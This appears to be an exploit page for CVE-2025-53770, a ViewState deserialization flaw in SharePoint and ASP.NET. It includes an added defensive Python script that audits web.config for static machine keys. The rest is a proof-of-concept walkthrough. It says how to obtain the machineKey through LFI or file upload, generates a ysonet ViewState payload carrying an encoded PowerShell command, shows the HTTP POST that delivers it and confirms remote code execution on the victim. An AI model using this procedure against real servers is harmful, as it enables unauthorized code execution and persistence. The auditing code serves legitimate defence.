CVE-2025-53770
Deserialization of untrusted data in on-premises Microsoft SharePoint Server (or any ASP.NET web application using ViewState) allows an unauthorized attacker to execute code over a network.
Requirements
The web app is using ViewState
The machineKey is known
The validationALG is known
appName
Extract machineKey and validationALG
To get the machineKey, validationALG and appName you need to have some access to the target machine. Whether that is through LFI, file upload, or because you already have code execution and are just looking for additional ways to get persistence, that's great.
The secrets will be stored in either web.config or in the registry. If you have file upload, use the file findMachineKey.aspx to extract the content of both.
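The same precondition checked from the defender's side: an added example (not from the original page, and not the findMachineKey.aspx file it mentions) that flags web.config content holding a literal machineKey or disabling the ViewState MAC. The sample configs, the key value and the function names are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample inputs (not taken from any real server).
STATIC_KEY_CONFIG = """<configuration><system.web>
  <machineKey validationKey="00112233445566778899AABBCCDDEEFF00112233445566778899AABBCCDDEEFF"
              decryptionKey="AutoGenerate,IsolateApps" validation="HMACSHA256" />
  <pages enableViewStateMac="false" />
</system.web></configuration>"""

DEFAULT_CONFIG = """<configuration><system.web>
  <machineKey validationKey="AutoGenerate,IsolateApps" decryptionKey="AutoGenerate,IsolateApps" />
</system.web></configuration>"""


def _local(tag):
    """Element name without an XML namespace prefix."""
    return tag.rsplit("}", 1)[-1]


def audit_web_config(xml_text):
    """Return findings for one web.config document; key material is never echoed."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) == "machineKey":
            for attr in ("validationKey", "decryptionKey"):
                value = el.get(attr, "AutoGenerate")
                # Anything other than AutoGenerate[,IsolateApps] is a literal key on disk.
                if not value.lower().startswith("autogenerate"):
                    findings.append(f"static {attr} in web.config ({len(value)} hex chars)")
        elif _local(el.tag) == "pages":
            if el.get("enableViewStateMac", "true").lower() == "false":
                findings.append("enableViewStateMac=false")
    return findings


if __name__ == "__main__":
    for name, text in (("static", STATIC_KEY_CONFIG), ("default", DEFAULT_CONFIG)):
        print(name, audit_web_config(text) or "no findings")
```

Any static key reported here should be treated as exposed once the file has been readable by an attacker, and rotated.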
PoC || GTFO
Generate payload:
PS C:\> [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('whoami > C:\Windows\Temp\viewstate_test.txt'))
dwBo...AdAA=
PS C:\> .\ysonet.exe -p ViewState -g TextFormattingRunProperties `
-c "powershell -e dwBo...AdAA=" `
--path="/default.aspx" --apppath="/" --validationalg="HMACSHA256" --validationkey="B29...73D" --islegacy --isdebug
Validation Algorithm: HMACSHA256
Validation Key: B29...73D
...
Calculated __VIEWSTATEGENERATOR: CA0B0334
%2FwEy6...WoRI%3D
Send payload:
POST / HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: application/x-www-form-urlencoded

__VIEWSTATE=%2FwEy6...VWoRI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=...&txtName=asdf&btnSubmit=Submit
Confirm RCE on victim:
PS C:\> type C:\Windows\Temp\viewstate_test.txt
iis apppool\.net v4.5